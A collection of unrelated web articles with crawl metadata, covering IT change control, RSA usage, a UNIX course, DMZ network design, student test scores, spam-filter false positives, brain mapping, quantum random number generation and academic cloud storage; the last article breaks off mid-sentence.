caused by changes being made,” or rephrased, “70-80% of the pain is caused by changes.” The point Hogg makes is that change is often a painful process because things can get hairy. Having a change management process in place is critical to ensure minimal risk when making IT changes. 2. Design Change The change control process serves the customer, whether internal or external to your company. For example, a manufacturer making changes to a product based on the needs of the customer requires a change control process that ensures proper reviews by engineering, safety, and operations teams before the customer approves a final design. Another company may not need a change control process for a customer but, instead, may need a document management system that ensures internal reviews by the legal and standards teams before final release. 3. Operations Change Businesses continually change the way they operate and handle their business processes, searching for efficiencies to be more cost effective. Changes to processes need to be reviewed and authorized to make sure it doesn’t impact operations in other areas. For example, a company that needs to make rate changes on their website may need those changes to be reviewed by multiple teams to find out where problems might occur and who would be affected. Additionally, when process changes impact multiple departments, the heads of those departments may need to grant approval before moving forward. 4. Software Change Companies creating software typically go through some sort of change control process where enhancements are requested, reviewed, and analyzed before being approved, then developed and tested before release. The more complex the enhancement request, the more potential impact to the product. Software can be helpful when supporting customers, so that every glitch in the software is reported and follows appropriate change control processes. Every company handles the steps differently, depending on their specific needs. Flexibility Is Key Change Control is a basic component of business operations and cannot be limited to one area within a business. Any software used to track your change control should be flexible enough to cover these multiple areas with easy and simple tweaks within the software that don’t require detailed programming modifications. If software has a specific Change Control function, can it be configured to be used outside of IT, or is it locked down specifically to that area? Does it handle simple checklists to branching workflow processes, depending on the needs of the business area? Can it be configured so you only need to use one tool across your entire company? How Issuetrak Can Help with Change Control Issuetrak’s flexible configuration allows for both simple and complex processes. By allowing you to determine the exact steps specific to your area of change including any required branching, you can use it across any business area to meet your various change control needs. Issuetrak doesn’t lock you into steps that may not apply, and it also allows you to create multiple processes, depending on which business area needs to implement change control. Whether your change control deals with Help Desk issues, design changes, operational changes, software enhancements or bug fixes, or something else, Issuetrak gives you latitude to define your own process and to make it as detailed as you’d like to ensure change requests are properly reviewed and approved and then efficiently implemented.
<urn:uuid:6c7e8273-af5e-43aa-8d7c-3e7e73de1940>
CC-MAIN-2017-04
https://www.issuetrak.com/change-control-and-issuetrak/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00085-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93379
1,066
2.53125
3
3.1.9 Is the RSA cryptosystem currently in use? The RSA system is currently used in a wide variety of products, platforms, and industries around the world. It is found in many commercial software products and is planned to be in many more. The RSA algorithm is built into current operating systems by Microsoft, Apple, Sun, and Novell. In hardware, the RSA algorithm can be found in secure telephones, on Ethernet network cards, and on smart cards. In addition, the algorithm is incorporated into all of the major protocols for secure Internet communications, including S/MIME (see Question 5.1.1), SSL (see Question 5.1.2), and S/WAN (see Question 5.1.3). It is also used internally in many institutions, including branches of the U.S. government, major corporations, national laboratories, and universities. At the time of this publication, technology using the RSA algorithm is licensed by over 700 companies. The estimated installed base of RSA BSAFE encryption technologies is around 500 million. The majority of these implementations include use of the RSA algorithm, making it by far the most widely used public-key cryptosystem in the world. This figure is expected to grow rapidly as the Internet and the World Wide Web expand. For a list of RSA algorithm licensees, see http://www.rsasecurity.com/
<urn:uuid:99086c1f-6ba4-47c5-bbc0-f96d89bc59c6>
CC-MAIN-2017-04
https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/rsa-cryptosystem-currently-in-use.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00387-ip-10-171-10-70.ec2.internal.warc.gz
en
0.938379
288
3.25
3
Learn UNIX concepts, terms, and commands in this powerful hands-on course that covers all flavors of UNIX. Get a foundational overview of UNIX operating system commands and utilities in this course. You will learn to navigate the UNIX file systems and to work with files, directories, and permissions. You will learn to manage UNIX processes and use regular expressions to create powerful search strings. You also will learn to create advanced shell scripts using shell built-ins and conditionals, and you will learn powerful commands used to perform advanced text processing Hands-on labs are run in a real-world UNIX environment, structured to allow you to learn by doing and developed to simulate real-world situations. You will build your UNIX knowledge and command skills in a clear and concise manner. Working in a controlled UNIX classroom environment with an expert instructor, you will learn UNIX concepts and commands, and you will receive professional tips and techniques that will help you build your UNIX skills and confidence.
<urn:uuid:1d6e781b-da98-460c-b063-915f3fcee859>
CC-MAIN-2017-04
https://www.globalknowledge.com/ca-en/course/116049/unix-fundamentals/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00021-ip-10-171-10-70.ec2.internal.warc.gz
en
0.888533
213
2.890625
3
Eventually, if you get interested enough in information security, you are going to wonder what a DMZ is and why you should or should not have one. DMZ is an acronym that stands for De-Militarized Zone, and in the ‘real’ world it is the location between two hostile entities such as North and South Korea. In the Security community, however, it is a separate, untrusted network where boxes serving public services should be placed. It’s a buffer zone between a completely untrusted network (like the Internet) and a relatively trusted network (like your private LAN). The primary reason for implementing a DMZ is to keep your public and private assets separated so that a compromise in the public area does not automatically result in a compromise of your private assets as well. There are two main ways to implement a DMZ for personal use. The first is using three or more NICs, as follows: - 1 NIC for the WAN (your gateway to the Internet; everything comes and goes through this NIC) - 1 NIC for the LAN (behind this NIC is where you have all your private assets, i.e. file servers, domain controllers, questionable material collections, etc.) - 1 NIC for the DMZ (this is where you put any machine that you want to allow people on the Internet to connect to, i.e. web servers, ftp servers, mail servers, game servers, etc.) This is one method of creating a DMZ, but it is not the preferred method. This configuration allows the security of both your DMZ and your LAN to lie in one system. If your machine that has all three of those NICs in it is compromised, so is your DMZ and your private network as well. Basically, you are allowing the Internet to ‘touch’ the very same machine that determines how secure your internal LAN is, and while the risk is pretty low, it’s not the ideal situation. The better way to do this is with three separate networks – the Internet, your DMZ, and your LAN. This is accomplished by using two firewalls – one on the border of your WAN (which handles your connection usually), and one on the border of your internal network. Let’s say that you have a broadband router (like Linksys, Netgear, Dlink, or whatever) and an OSS-software-based firewall (like Astaro, M0n0wall, etc). What you do is you put your router on your border (right behind your modem), and you connect the LAN side of that router to a hub or switch. To that hub or switch (your DMZ hub/switch) you use one of the ports to connect your bastion host/public server(s). This machine (or machines) run the services that you want people to be able to connect to from the outside. This may be a web site, an FTP server, or a multiplayer game like WCIII or Counterstrike. You want this machine to be hardened (preferably very well), meaning that it is completely patched and is running as few services as possible. As a general rule though, you want anything put in the DMZ to be resistant to attacks from the Internet since public access is the reason that you are putting it out there in the first place. How to harden the servers you put in your DMZ is outside the scope of this article, but suffice it to say that you want to lock them down – no services running that don’t need to be, all updates applied, etc. Now, to that same switch (the DMZ switch) you are going to attach another network cable that goes to your internal firewall (your Linux/BSD firewall). It is important to note that you want your strongest firewall closest to your LAN; or, putting it another way, you want your weakest firewall on your border. This may seem counterintuitive but it’s usually the right way to do things. Basically, you want the most powerful and most configurable firewall protecting your LAN – not your DMZ. As for your internal firewall, it’s going to have two NICs in it – one for the DMZ side and one for the private LAN side. Connect the cable coming from your DMZ switch to the DMZ side of the internal firewall (the external interface), and on the other side of the firewall (the private LAN side) you connect a cable to another hub/switch that all of your LAN computers will connect to. If that was confusing, think of it this way: Internet -> Modem Modem –> Router Router –> DMZ Switch DMZ Switch –> WEB/FTP/Game Server DMZ Switch –> Firewall External NIC Firewall Internal NIC –> LAN Switch LAN Switch –> LAN Systems What This Gives Us So let’s take a look at the Security that is offered by this setup. At the border you have NAT translation going on that passes only the ports that you need to in order for the public to use the servers in your DMZ. Let’s say you are running a web server, an FTP server, and a game server for a game called FooAttack. On your border router/firewall you pass ports 80, 21, and 5347 (the FooAttack server port). All other attempted connections to your external IP address drop dead at your border; only those three ports passed above are allowed through because of NAT. The nature of NAT dictates that only return traffic (traffic is part of a connection that originated from the inside of the NAT device) will be allowed back into the NAT’d network. This side effect of NAT, while not its original or main goal, is a fairly powerful Security feature. If your border device supports filtering of any sort in addition to NAT then you can further lockdown your network by restricting who can and cannot connect to the hosts in your DMZ. That first border layer, while being good, is just one piece of the overall DMZ Security posture. The real beauty of this setup lies in what happens if someone *does* get a hold of a machine in your DMZ. Imagine that you have the setup like I laid out above, but unbeknownst to you there is a major vulnerability in the web server you are running. So here you are offering web content to the entire Internet and someone runs the proper exploit vs. your machine and roots it. Now what? Now nothing. Your second and more powerful firewall (the one that they are still *outside* of) – does not pass *any* traffic from the DMZ inside to the LAN. (In fact, you should have it where it won’t even respond to ICMP from DMZ machines, so the odds are they won’t even know it’s there.) And now, rather than being able to bounce around on your juicy internal LAN like they planned, they are stuck in the middle of a completely untrusted and unprivileged network that doesn’t have anything on it other than what you intended for public viewing anyway. This is a DMZ. Even if they did know where the internal firewall was it wouldn’t even entertain the notion of passing connection attempts from the DMZ. This internal layer of protection is NAT’d just like your first layer, only there are no ports being passed inside like from the Internet to the DMZ. Your second firewall actually has no idea what to do with packets that are designed to initiate new connections with it, so it just drops them. The only traffic that is going to make it through that firewall is traffic that you specifically request be allowed through by talking to a machine outside of that firewall, i.e. when you go to /., it will allow the web content to come *back* to you so you can view the page, but if someone tries to initiate a new connection to you, they get dropped. Both NAT and SPI afford this protection to you, each in different ways. So, to sum it all up, imagine someone is scanning around looking for web daemons to tear up and they find yours. Many inexperienced attackers would assume that you are running something on your public IP address, as if you have your main workstation is sitting right on the Internet and it is running a web daemon. So, they connect to it, get a web page, and then scurry to dig up their favorite HTTP exploit tool that someone else wrote. What they don’t know is that they are actually connecting to a private IP in your DMZ. It has no ‘real’ IP address as far as the Internet is concerned. If you didn’t pass that port at the border device then they wouldn’t have seen anything at all with their scan. But let’s say they do see your web daemon because you are passing port 80 through to your DMZ host running a web site, and it turns out it has a vulnerability in it. They run their exploit and get root on your box. This causes them tremendous joy, and they hurry to tell all their buddies because they think they’re Alan Cox. The thing is, they have little to celebrate. All they have is a barebones server with nothing of value on it – no vital info, no browsing history, no personal information — nothing. In fact, all you have on there is content that you wanted the public to see in the first place (which is also safely backed up on your internal network and/or removable media). So, they have root on the machine and ping around in your DMZ and soon find that there isn’t much there. If they are smart they will do an ifconfig (or ipconfig if you swing that way) and find out they are on a private subnet – but this gains them nothing. The odds are that from there they’ll either load some trash onto your system or try and destroy it. Either way, it doesn’t matter. The moment you detect what has happened (tripwire, snort, whatever…) you simply pull the plug, reinstall the box, and restore the backup. Within a few minutes you have a brand-new system ready to go back online, and at no point during the process was your private LAN in danger. This is the benefit of running a DMZ. Hopefully this basic description of the general concept has been helpful to someone. If you have any questions about DMZs or any other Security topics, feel free to contact me.: [Originally published in March of 2003 at NewOrder]
<urn:uuid:2a459bd0-0e23-424d-b5fd-71007a178e5d>
CC-MAIN-2017-04
https://danielmiessler.com/study/dmz/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280310.48/warc/CC-MAIN-20170116095120-00507-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951693
2,215
2.953125
3
U.S. Students Rank Lower Than Ever in Science and Math Comparing the scores of 15-year-old students in the United States to their international peers, the PISA (Program for International Student Assessment) report results, released Dec. 4, are especially disheartening this year. The average combined science literacy scale score for U.S. students was lower than the OECD (Organization for Economic Cooperation and Development, an intergovernmental agency of 30 member countries and the sponsor of the report) average, according to the latest PISA results. U.S. students fell to 25th place in math and 21st place in science. The United States was joined by Spain and Italy among the 32 countries that were classified as below OECD average. "In today's technology-based societies, understanding fundamental scientific concepts and theories and the ability to structure and solve scientific problems are more important than ever," the report said. Finnish 15-year-olds took the top spot in science knowledge, South Korea came in first in reading, and Taipei students were the smartest at math.
<urn:uuid:d6ba2a2a-980d-4559-b743-b588de87caa7>
CC-MAIN-2017-04
http://www.eweek.com/careers/us-students-rank-lower-than-ever-in-science-and-math.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00139-ip-10-171-10-70.ec2.internal.warc.gz
en
0.968114
225
2.6875
3
Primer: Spam Filtering: The False PositiveBy David F. Carr | Posted 2003-12-01 Email Print Spam-blocking applications can screen out legitimate e-mail messages. A look at what can trip up your company. A legitimate e-mail that is not delivered because a spam filter incorrectly identifies it as junk mail. Why is it a problem? E-mail is an essential business tool, and there's a cost when it doesn't work as intended. For example, your company might use an application to generate order confirmations to customers. But a false positive can sidetrack a legitimate order. How does it happen? Messages are red-flagged in the spam-blocking applications used by companies and Internet-service providers to screen activity on incoming e-mail servers. A filter typically scans and scores each e-mail, blocking delivery of what it deems spam. A false positive results when a sender unwittingly includes enough of these red flags in a legitimate e-mail for it to be deemed spam. How are spam scores determined? Spam filters base scores on known spam techniques. Most filters work by parsing the headers, content and technical characteristics of e-mail, looking for specific indicators. One or two indicators alone don't usually earn a spam label, but if the filter identifies enough suspicious patterns—the presence of Hypertext Markup Language (HTML) or a suspicious server origin—the spam score is met and the e-mail is rejected. Anti-spam systems also keep blacklists of known spammers, as well as lists of approved senders. Most anti-spam systems keep their rules secret to prevent spammers from targeting them. What characteristics cause problems? Suppose you send a monthly HTML e-mail that contains an image tag pointing to a graphic on your Web server. A spam filter would likely flag it because it contains HTML and links to an image—making it look a lot like a common pornography advertisement. Other content indicators include ALL CAPS text, red font tags, huckster language like "pure profit" and even the word "remove." Spammers often misuse the seemingly benign "remove me from this list" offer to verify e-mail addresses and subject them to more spam. Spam-blockers also check technical characteristics on the theory that spammers typically have sloppy coding habits. A common technical red flag is when the "From" address doesn't match the header automatically added by the e-mail server of origin. That's a problem for a company that uses a third-party service to send e-mail that appears to be coming directly from its domain. Witness Tumbleweed Communications, which makes an anti-spam application and was chagrined to find that its product filtered out Web conference invitations it had sent to its own clients using the WebEx service. I'm not selling Viagra. Why should I worry? Because spam techniques keep changing. Your application that auto-generates e-mail can work fine one day and be flooded with return mail the next. Your staff needs to stay on top of spam-blocking updates and guard against false positives. The very fact that your company uses an automated Web script to generate e-mail may now be a red flag on your customers' spam filters.
<urn:uuid:6b536d55-b444-40ce-aee9-b646a93c5f92>
CC-MAIN-2017-04
http://www.baselinemag.com/it-management/Primer-Spam-Filtering-The-False-Positive
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00498-ip-10-171-10-70.ec2.internal.warc.gz
en
0.92847
675
2.796875
3
IBM Research Shows Off Two New Watson-Related Medical Projects Moreover, as medical experts interact with WatsonPaths, the system will use machine-learning to improve and scale the ingestion of medical information. WatsonPaths incorporates feedback from the physician who can drill down into the medical text to decide if certain chains of evidence are more important, provide additional insights and information, and weigh which paths of inferences the physician determines lead to the strongest conclusions. Through this collaboration loop, WatsonPaths compares its actions with that of the medical expert so the system can get “smarter.” WatsonPaths, when ready, will be available to Cleveland Clinic faculty and students as part of their problem-based learning curriculum and in clinical lab simulations, IBM said. Meanwhile, IBM and Cleveland Clinic are using Watson EMR Assistant to explore how to navigate and process electronic medical records to unlock hidden insights within the data, with the goal of helping physicians make more informed and accurate decisions about patient care. Historically, the potential of EMRs has not been realized due to the discrepancies of how the data is recorded, collected and organized across health care systems and organizations. The massive amount of health data within EMRs alone presents tremendous value in transforming clinical decision making, but can also be difficult to absorb. For example, analyzing a single patient’s EMR can be the equivalent of going through up to 100MB of structured and unstructured data in the form of plain text that can span a lifetime of clinical notes, lab results and medication history, IBM said.Company officials said the goal of the Watson EMR Assistant research project is to develop technologies that will be able to collate key details in the past medical history and present to the physician a problem list of clinical concerns that may require care and treatment, highlight key lab results and medications that correlate with the problem list, and classify important events throughout the patient’s care presented within a chronological timeline. IBM and Cleveland Clinic are discussing the role of Watson for the future of medicine at the Cleveland Clinic Medical Innovation Summit being held October 14-16 in Cleveland. Watson’s natural language expertise allows it to process an EMR with a deep semantic understanding of the content and can help medical practitioners quickly and efficiently sift through the massive amounts of complex and disparate data and better make sense of it all. The system’s natural language processing and machine learning technologies are being applied to begin analyzing whole EMRs with the goal of surfacing information and relationships within the data in a visualization tool that may be useful to a medical practitioner, IBM said.
<urn:uuid:7e68753e-26de-4181-b493-c8198ff3e595>
CC-MAIN-2017-04
http://www.eweek.com/database/ibm-research-shows-off-two-new-watson-related-medical-projects-2.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283008.19/warc/CC-MAIN-20170116095123-00406-ip-10-171-10-70.ec2.internal.warc.gz
en
0.93215
525
2.75
3
Truly Random Number Generator Promises Stronger Encryption Across All Devices, CloudSo long pseudo-random number generator. Quantum mechanics brought us true randomness to power our crypto algorithms, and it's strengthening encryption in the cloud, datacenter, and the Internet of Things. SAN FRANCISCO, RSA Conference -- In light of yet another SSL vulnerability this week, any improvements to the underpinnings of encryption would be welcome. One weakness of encryption algorithms -- one that simply increasing from 128-bit to 256-bit can't solve -- is that they are based on pseudo-random number generators; not truly random number generators. Whitewood Encryption Systems, which launched in summer 2015, is changing that, by using quantum mechanics. They generate truly random numbers by harnessing the entropy (randomness or disorder) of nature, which is much more random than any of the sources computing systems currently glean for entropy. Two problems with old entropy collection Entropy is collected at the hardware level, typically by actions like keystrokes and mouse movements. There are two troubles here. One: keystrokes and mouse movements don't create enough entropy. In a Linux kernel, the entropy is used to create random characters that are put in two special files: dev/random and dev/urandom. As Richard Moulds, Whitewood's vice-president of business development and strategy, describes it, dev/random is the good drinking water -- the true random numbers -- while dev/urandom may be fine for industrial uses, but you wouldn't want to drink it. If the two were faucets, the usual amount of entropy would produce a steady flow of dev/urandom, but only a few drips of the delicious dev/random. So, when an application -- even a cryptographic application -- calls for a random number, they might get one of those low-quality urandom ones. Two: Since entropy is generated from hardware, every layer of abstraction from the hardware will have reduced access to entropy -- and that's troubling for anyone who uses virtualization. "One bad reason to do virtualization," says Moulds, "is it's a firewall for entropy. In the virtual world, there ain't no randomness." The product Whitewood launched with in August, the Entropy Engine, addresses the first problem. It turns the drip of drinking water into a steady flow. The natural world has light and sound to draw entropy from, but certain environments aren't particularly changeable -- a datacenter, for example, is usually just full of white noise and immobile machinery -- so it's not a great source of randomness. So, what Whitewood does is put a quantum optical field right inside the server, and capture the randomness of the photons' naturally unpredictable behavior. (Photons are naturally prone to bunching up, unbunching, then bunching up again, causing the optical field to dim, brighten, and flicker in a completely random way.) One of the products Whitewood launched at RSA this week, NetRandom, addresses the second problem. As Raymond Newell, research scientist at Los Alamos National Laboratory and contributor to Whitewood's creation, explains, "We take the randomness we create and spread it across the network." Before, Entropy Engine only worked on the local device. With NetRandom, they can feed randomness through the network and strengthen the encryption used by virtual machines, cloud instances, clients, servers, and embedded systems in Internet of Things devices. "One of them could support tens of thousands of virtual machines," says Newell. Any application that uses cryptography can benefit, without needing to make any modifications; and without needing any help from their cloud service providers or IoT device manufacturers. Newell believes this will be a boon for security on industrial control systems' and other embedded systems that are expected to last 10 to 20 years with minimal support. "One of the reasons we like quantum mechanics is because we're confident it's going to keep up," he says. Whitewood also announced a partnership with wolfSSL, a company that sells stripped-down crypto toolkits for embedded systems that don't run full-blown operating systems -- like ATMs and IoT devices. The partnership will allow wolfSSL to provide that stronger encryption to customers. Whitewood also announced an integration with Cryptsoft, an OEM provider of a key management integration protocol. The integration, says Newell, "allows to attest to the origin of the keys," which improves key management and can could further empower digital signatures. Find out more about security threats at Interop 2016, May 2-6, at the Mandalay Bay Convention Center, Las Vegas. Register today and receive an early bird discount of $200. Sara Peters is Senior Editor at Dark Reading and formerly the editor-in-chief of Enterprise Efficiency. Prior that she was senior editor for the Computer Security Institute, writing and speaking about virtualization, identity management, cybersecurity law, and a myriad ... View Full Bio
<urn:uuid:94866f92-e2a0-4526-9793-b06d8f1aa818>
CC-MAIN-2017-04
http://www.darkreading.com/endpoint/truly-random-number-generator-promises-stronger-encryption-across-all-devices-cloud/d/d-id/1324566?_mc=RSS_DR_EDT
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00554-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923305
1,042
2.984375
3
The Harvard Medical School publication, Focus, has an intriguing feature article, which describes a cutting-edge neuroscience advance: brain mapping. Researchers at Harvard Medical School’s Department of Neurobiology say they’ve figured out a technique for crawling through the connections in the brain much like the way a computer algorithm crawls through network connections, like those in popular online apps, such as Google and Facebook. This is no easy task. Compared to computer circuits, with their fairly straightforward design, the brain’s neural system is a tangled mess. But if that mess could be unraveled, the applications are “too numerous to list,” according to Clay Reid, HMS professor of neurobiology and senior author on a paper in the March 10 edition of Nature, which details the findings. Reid’s lab has been studying the cerebral cortex for some years, and they have had some success in isolating the activities of individual neurons. For example, they are able to observe them fire in response to external stimuli. But they have not yet been able to get inside a single cortical circuit and “probe the architecture of its wiring.” The article explains that just one of these circuits contains between 10,000 and 100,000 neurons, and each neuron makes about 10,000 interconnections. Which means a single circuit can contain more than one billion connections. Determined to figure out not only what the circuit does, but how it does it, Reid’s team employed a two part approach. First, they developed an imaging technique, which they used to detail the vision processing center of a mouse brain. Advanced microsopy tools enabled them to view the neurons at nanometer-level resolution. After they’d recorded more than 3 million such high-resolution images, the data was sent to the Pittsburgh Supercomputing Center at Carnegie Mellon University, where it was reconstructed into 3D images. The second stage of the project was even more challenging: unravelling the mass of neurons. For this, the team selected 10 individual neurons for mapping. By carefully tracing each neuron, they were able create a partial wiring diagram. A related video shows the wiring diagram. It also includes side-by-side videos: on the left is the movie shown to the mouse; on the right is the recording of the visual neurons. While not a perfect match, the similarity is evident. The next step for the researchers is to scale up the system to handle larger data sets. Possible future applications sound like the stuff of science fiction. Reid believes that in as little as ten years, it could be possible to use the imaging technique to record the activity of thousands of neurons in a living brain, stating: “In a visual circuit, we’ll interpret the data to reconstruct what an animal actually sees. By that time, with the anatomical imaging, we’ll also know how it’s all wired together.”
<urn:uuid:43e80cbb-ff0c-4f2f-8043-f031487a3fc6>
CC-MAIN-2017-04
https://www.hpcwire.com/2011/03/09/harvard_researchers_map_brain_circuitry/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.947662
602
3.75
4
This document is a guide to setting up an IP-Surveillance system in a small- to medium-sized security installation. It provides an overview of network video’s functionalities and benefits, and outlines considerations and recommendations for implementing such a system. 1. Introduction to an IP-Surveillance system This chapter provides an overview of what is involved in an IP-Surveillance system, the benefits of net- work video, the importance of defining your surveillance application and legal considerations to take into account when setting up an IP-Surveillance system in your area. 1.1 What is IP-Surveillance? IP-Surveillance is a term for a security system that gives users the ability to monitor and record video and/or audio over an IP (Internet Protocol-based) computer network such as a local area network (LAN) or the Internet. In a simple IP-Surveillance system, this involves the use of a network camera (or an ana- log camera with a video encoder/video server), a network switch, a PC for viewing, managing and storing video, and video management software. Download this guide below to read more.
<urn:uuid:0f5630a9-a7ba-4edd-9500-fcb0fad6b84f>
CC-MAIN-2017-04
http://www.bsminfo.com/doc/ip-surveillance-design-guide-0001
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.833295
244
2.609375
3
Graph databases use graph structures (a finite set of ordered pairs or certain entities), with edges, properties and nodes for data storage. It provides index-free adjacency, meaning that every element is directly linked to its neighbour element. No index lookups are necessary. Graph database are faster when it comes to associative data set compared to relational databases. As they do not need join operations, they can scale naturally to large data sets. Gephi helps people understand and discover graphs and patterns. It uses a 3D engine to show graphs in real-time that can help users make hypothesis, isolate structure singularities or fault during data sourcing. It is written in Java on the Netbeans platform. It can be used to analyse graphs extracted from OrientDB. FlockDB is a simple graph database and is intended for online low-latency, high throughput environments, like websites. FlockDB is being used by Twitter to store social graphs. It is a distributed graph database and can support complex arithmetic queries. The database is licensed under the Apache License. GraphBuilder can reveal hidden structures in big data as it can construct graphs out of large sets of data. It is developed by IBM, built in Java, it uses Hadoop and it scales using the Map Reduce parallel processing model. The GraphBuilder library takes care of many of the difficulties of graph construction, such as graph transformation, formation and compression. InfoGrid is developed in Java and at the heart of it lies the GraphDatabase. It offers many additional software components that makes it easy to develop graph based web applications. InfoGrid is sponsored by NetMesh and they offer also commercial support for using InfoGrid. InfiniteGraph helps users to ask more complex and deeper questions across their data stores. It can work with massive amounts of distributed data and especially those projects that need more than one server will benefit the most from the graph database. It offers high-speed graph traversals, scalability and parallel consumption of the data. Gremlin is a graph traversal language and it can be used for graph analysis, query and manipulation. Gremlin works with the graph databases that have included the Blueprints property graph data model. These include among others Neo4j, OrientDB, InfiniteGraph. Gremlin provides native support for Java and Groovy. HyperGraphDB is a general purpose data storage mechanism designed for knowledge representation. It is based on directed hypergraphs and offers graph-oriented storage. It can be used as an embedded object-oriented database for Java projects or as a NoSQL relational database. The core of the database engine is designed for generalized, typed and directed hypergraphs. GraphBase is a Graph Database Management System that was built from scratch in order to manage large graphs. It makes huge, very structured data stores possible. Graphbase simplifies the usage of graph-structured data, instead of working with very complex spaghetti-like structures. With GraphBase Singleview, it becomes possible to turn a database into a single, searchable and navigable graph. Brightstar DB Mobile and Embedded are the open-source tools of BrightstarDB. It is a NoSQL database designed for the .NET platform that is fast, embeddable and scalable. It does not need fixed schema, which gives is a lot of flexibility in what and how the data is stored. Its associative data model fits perfectly with real world applications. Sparksee (formerly known as DEX), makes space and performance compatible with a small footprint and a fast analysis of large networks. It is natively available for .Net, C++, Python and Java, and covers the whole spectrum of Operating Systems. Sparksee mobile is the first graph database available for iOS and Android. Neo4j is a graph database boasting massive performance improvements versus relational databases. It is very agile and fast. At the moment it is used by many startups in applications such as social platforms, fraud detection, recommendation engines etc. The data is stored in nodes that are connected by directed, typed relationships with properties of both (a property graph).
<urn:uuid:c9d2748e-5680-401a-bc71-a389ae06745f>
CC-MAIN-2017-04
https://datafloq.com/big-data-open-source-tools/os-graph-databases/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00490-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94238
832
2.875
3
Last month, the San Diego Supercomputer Center launched what it believes is “the largest academic-based cloud storage system in the U.S.” The infrastructure is designed to serve the country’s research community and will be available to scientists and engineers from essentially any government agency that needs to archive and share super-sized data sets. Certainly the need for such a service exists. The modern practice of science is a community activity and the way researchers collaborate is by sharing their data. Before the emergence of cloud, the main way to accomplish that was via emails and sending manuscripts back and forth over the internet. But with the coalescence of some old and new technologies, there are now economically viable ways for sharing really large amounts of data with colleagues. In the press release describing the storage cloud, SDSC director Michael Norman described it thusly: “We believe that the SDSC Cloud may well revolutionize how data is preserved and shared among researchers, especially massive datasets that are becoming more prevalent in this new era of data-intensive research and computing.” Or as he told us more succinctly, “I think of it as Flickr for scientific data.” It’s not just for university academics. Science projects under the DOE, NIH, NASA, and others US agencies are all welcome. Even though the center is underwritten by the NSF, it gets large amounts funding and researchers from all of those organizations. Like most NSF-supported HPC centers today, SDSC is a multi-agency hub. Norman says that the immediate goal of this project is to support the current tape archive customers at SDSC with something that allows for data sharing. For collaboration, he says, tape archive is probably the worst possible solution. Not only is the I/O bandwidth too low, but with a tape platform, there is always a computer standing between you and your data. With a disk-based cloud solution, you automatically get higher bandwidth, but more importantly, a web interface for accessing data. Every data file is provided a unique URL, making the information globally accessible from any web client. “It can talk to your iPhone as easily as it can talk to your mainframe,” says Norman. The initial cloud infrastructure consists of 5.5 petabytes of disk capacity linked to servers via a couple of Arista Networks 7508 switches, which provide 10 terabits/second of connectivity. Dell R610 nodes are used for the storage servers, as well as for load balancing and proxy servers. The storage hardware is made up of Supermicro SC847E26 JBODs, with each JBOD housing 45 3TB Seagate disks. All of this infrastructure is housed and maintained at SDSC. The cloud storage will replace the current tape archive at the center, in this case a StorageTek system that currently holds about a petabyte of user data spread across 30 or 40 projects. Over the next 12 to 18 months, SDSC will migrate the data, along with their customers, over to the cloud and mothball the StorageTek hardware. According to Norman some of these tape users would like to move other data sets into these archives and the cloud should make that process a lot smoother. “We are setting this up as a sustainable business and hope to have customers who use our cloud simply as preservation environment,” he says. For example, they’re already talking with a NASA center that is looking to park their mission data somewhere accessible, but in an archive type environment. The move to a storage cloud was not all locally motivated however. Government agencies like the NSF and NIH began mandating data sharing plans for all research projects. Principal investigators (PIs) can allocate up to 5 percent of their grant funding for data storage, but as it turns out, on a typical five- or six-figure research grant, that’s not very much money. In order for such data sharing to be economically viable to researchers, it basically has to be a cost-plus model. Norman thinks they have achieved that with their pricing model, although admits that “if you asked researchers what would be the right price, it would be zero.” For 100 GB of storage, rates are $3.25/month for University of California (UC) users, 5.66/month for UC affiliates and $7.80/month for customers outside the UC sphere. Users who are looking for a big chunk of storage in excess of 200TB will need to pay for the extra infrastructure, in what the program refers to as their “micro-condo” offering. The condo pricing scheme is more complex, but is offered to users with really large datasets and for research grants that include storage considerations for proposals and budgeting. And even though this model doesn’t provide for a transparently elastic cloud, the condo model at least makes the infrastructure expandable. According to Norman, their cloud is designed to scale up into the hundreds of petabytes realm. Although data owners pay for capacity, thanks to government-supported science networks , data consumers don’t pay for I/O bandwidth. Wide are networks under projects such as CENIC (Corporation for Education Network Initiatives in California), ESNet (Energy Sciences Network), and XSEDE (Extreme Science and Engineering Discovery Environment) are public investments that can be leveraged by SDSC’s cloud. That can be a huge advantage over commercial storage clouds like Amazon’s Simple Storage Service (S3), where users have to account for data transfer costs. While some researchers may end up using commercial offerings like Amazon S3, Norman thinks those types of setups generally don’t cater to academic types and are certainly not part of most researchers’ mindsets. They are also missing the some of the high-performance networking enabled by big 10GbE pipes and low-latency switching at SDSC. Whether the center’s roll-your-own cloud will be able to compete against commercial clouds on a long-term basis remains to be seen. One of the reasons a relatively small organization like SDSC can even build such a beast today is thanks in large part to the availability of cheap commodity hardware and the native expertise at the center to build high-end storage systems from parts. There is also OpenStack — an open-source cloud OS that the SDSC is using as the basis of their offering. Besides being essentially free for the taking, the non-proprietary nature of OpenStack also means the center will not be locked into any particular software or hardware vendors down the road. “With OpenStack going open source, it’s now possible for anybody to set up a little cloud business,” explains Norman “We’re 